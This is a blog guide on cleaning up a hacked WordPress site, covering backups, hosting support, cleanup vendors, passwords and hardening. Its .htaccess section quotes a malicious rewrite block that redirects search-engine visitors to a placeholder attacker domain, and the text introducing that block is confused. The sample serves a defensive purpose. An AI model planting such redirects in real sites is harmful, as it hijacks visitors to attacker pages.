How to Recover Hacked WordPress Website

One word we never want to hear is hacked. Moreover, it is common with WordPress websites not looked after properly.

WordPress is the most widely used content management system in the world. The sheer volume also makes it the most targeted platform. It is very stressful to get your WordPress website hacked.

Here is a complete and comprehensive guide for the worst scenarios. Sometimes they manage to penetrate into your website, no matter how security conscious you are.
So let us check out how we can clean our hacked WordPress website.

Do Not Freak Out

The first step is as simple as that. Take a deep breath. Stress and anger would only make the situation worse. Keeping your composure would help you come up with the best possible strategy. Try to put all your energy in finding the solution, rather than stressing out.

Find out the Hack

Carefully the scenario and take some notes. What is happening? Are you unable to log in to your WordPress admin board? Alternatively, maybe your website is redirecting to another website.

Are there any illegal links on your website? Is your website already marked insecure by Google?
Make your notes in the light of answers to these questions. These notes will help you in further process.

Get in Touch with your Hosting Company

Most of the hosting companies co-operate in these issues. They have experienced staff who can help you get everything back in order. Since they have faced these scenarios before, they are well equipped to help.

The first step always is to understand the problem. Our previous step was all about understanding the issue.
Once you know the core of your problem, you are ready to share it. If the incident is a hacked WordPress website, the hosting company should be the first priority for sharing. Get in touch with them and do as they say.

What if your website is hosted on a shared server? You can check if a hacker accesses your website through another site that shares the server. Your hosting provider can tell you more details about the incident.

How the perpetrator hacked your website? Which loophole did he use? How did it spread?

Try to Restore Your Previous Version

Do you have the habit of backing up your website? Well, you are safe in case of yes. It would be best to restore the earlier version. The point of time before the website was hacked.

Please notice that your entire website would revert to that point in time. Any updates you made after that would be lost. Be it images, posts, general changes or anything.

However, when you need to clean the hacked WordPress website, this does not mean too much.
Once you recover through the backup, do not think you are free. Your website is still vulnerable to attacks. Now take proper security measures to confirm that it never happens again.

Your recent changes might be valuable and you do not want to lose them. Then it is okay not to take backup. There are other ways around.

Consult the Professional

Security is a serious measure. Hiring professionals is the best way to get if your WordPress website is hacked.  The wronged websites get worse and worse with passing time. Get professional help as soon as possible.

It is the best solution if you are not tech-savvy. In addition, if you want to be extra curious, which is actually wise in this case.

Ask for support, if you do not find yourself ready to make changes in the backend of your website. Not everyone has is comfortable dealing with codes and servers.

Hackers usually hide their scripts in more than one location to smooth the way for the next visit.

Few Good Solution provider

Security professionals usually, charge more than 100 dollars per hour. It would be too much for small businesses to bear. Do not fret there are other ways out.

The best solution is Sucuri. They offer malware and hack cleanup for $199 that also includes their firewall and monitoring service for a whole year.

Another great option is Malcare. This is an ultimate WordPress security solution to protect your website in an online environment. It makes sure that your business is always protected and available for visitors.

  • Wordfence help to fix unlimited pages on a single site for $179.
  • OneHourSiteFix assist to clean infected sites in one hour.
  • Jim Walker helps you to clean the hacked site quickly. Jim is available on a call for consulting.
  • wpfixit24/7 INSTANT WORDPRESS SUPPORT.
  • Fix My Sitebegin from as low as $99 to repair the sites

The powerful scanner does not let your website slow down your website. It goes beyond just signature matching to find new and complex malware that usually go undetected in other popular scanners.

Trusted WordPress Themes & Plugins

Themes and plugins are the building blocks of the WordPress website. Ensure that you always install trusted WordPress themes and plugins.

Keep updating them. If you fail to update and hacker takes advantage of security loopholes of outdated versions, you cannot blame anyone but yourself.

Inactive WordPress themes and plugins are one of the most favorite weapons of hackers. This is where they hide their backdoor.

The method of bypassing normal authentication and gaining the ability to remotely access the server while remaining undetected is called backdoor.

This way hacker can regain access even after you remove the malicious plugin.
To ensure you have Trusted WordPress themes, install Theme Authenticity Checker. If there is any malicious code in your themes, it will detect and mention the infected file.

You can either manually remove the code or replace the file with the original one. Upload brand new WordPress file from fresh download.

Also, try your best to install the trusted wordpress themes, rather than unreliable ones.

Check the User Permissions

Do not forget to check user permissions of all your users. Kindly double-check them. Remove any suspicious new users, immediately if found. Only you and your trusted team should have access to admin accounts.

Trusted WordPress themes

The Passwords & Secret Keys

Are you sure you have changed all passwords related to your WordPress website? Be clear about what it includes.
It includes the password to access your WP dashboard, cPanel, MySQL database, and FTP. Any other password that can help someone access your website is included.

The password should be strong and unique. It should be difficult for hackers or bots to guess. An ideal password is a combination of characters and numbers. It is not any real word. Randomness is the ultimate option here. If you find it difficult to come up with a random password, take help from any good password generator tool.

To reassure the safety and security of your WordPress website, change your secret keys. If you want to channelize this, install the iThemes Security Plugin. That makes the whole procedure easy and simple.

All these tips would help you restore or clean your WordPress website. That is not all. The road goes on.
WordPress security is not an ending process. Today, you have to take security measures on a daily basis. To keep hardening your WordPress website, you need security measures.
Information Security is not a one-time task rather it is a lifestyle.

WordPress Security is a constant effort. Hackers will never stop trying, neither should you.
It is time to take security in your hands.

Change FTP,CPanel & MYSQL Passwords

Regaining full control over your website after a hacker attack isn’t that difficult but can be scary or feel chaotic, as long as one has never tried it before. we strongly encourage all to update their CPanel,FTP and MYSQL passwords to further improve security.

Clear .htaccess

We often see hacked sites handle redirects and actions that are specified in the .htaccess file.You can do a quick outside spot check using Google’s Safe Browsing diagnostic page to see if they’ve detected anything malicious on your site in their most recent crawl. You would simply want to replace example.com with your actual domain name in the following URL:

RewriteEngine On

RewriteOptions inherit

RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]

RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

Replace WordPress System Files

To reset WordPress back to the default installation settings, download and remove all WordPress site files from your server except the /wp-content directory.

Go Next, you’re going to need to upload a blank WordPress installation (all files except /wp-content directory) to the server; either via CPanel or FTP.

Update the wp-config.php file with your database credentials + salt keys.

Finally, sign into WordPress and reactivate desired plugins.

How to harden your WordPress website?

In the first place, no security is better than having a backup solution. If you do not have it, arrange it somehow.
Hereafter you can follow some basic tips to avoid any incident. Aside from backup, the following are some useful practices.

  • Firewall and Monitoring System – Both of these things are mandatory. Most of the experts recommend Sucuri plugin for this. It blocks the attacks before they reach your server in most cases.
  • Managed WordPress Hosting – This is a good option. They perform much better when it comes to security. The two most recommended options are Pagely and WPEngine.
  • Try to disable theme and plugin editors – This is very good practice. Disable file edit in WordPress, so no one can mess with your files.
  • Limit the Login Attempts – Limited login attempts are the ultimate security measure for brute force attacks.
  • The Admin Directory – It is the most important part of the website. Protect it with a password. It would be an additional layer of password to your WordPress admin area. Think of it is a double lock.
  • Disable PHP Execution – You must disable PHP execution in certain directories. This also acts as an additional layer of security.

Wrapping it up

We hope that this article helped you out in fixing your hacked WordPress website. If you are still going through problems, we recommend taking expert help. WordPress security seems to be daunting, but little care can really help you.

Editorial Staff

aThemeArt Editorial Staff prepares and cooks all the content that are published on athemeart.com. They are responsible for all type of web content including blog, social posts, videos, documentation etc.

Leave a Reply

Your email address will not be published. Required fields are marked *

2 + 15 =

This site uses Akismet to reduce spam. Learn how your comment data is processed.

NEW FREE THEME! BCF IS HERE GET FREE THEME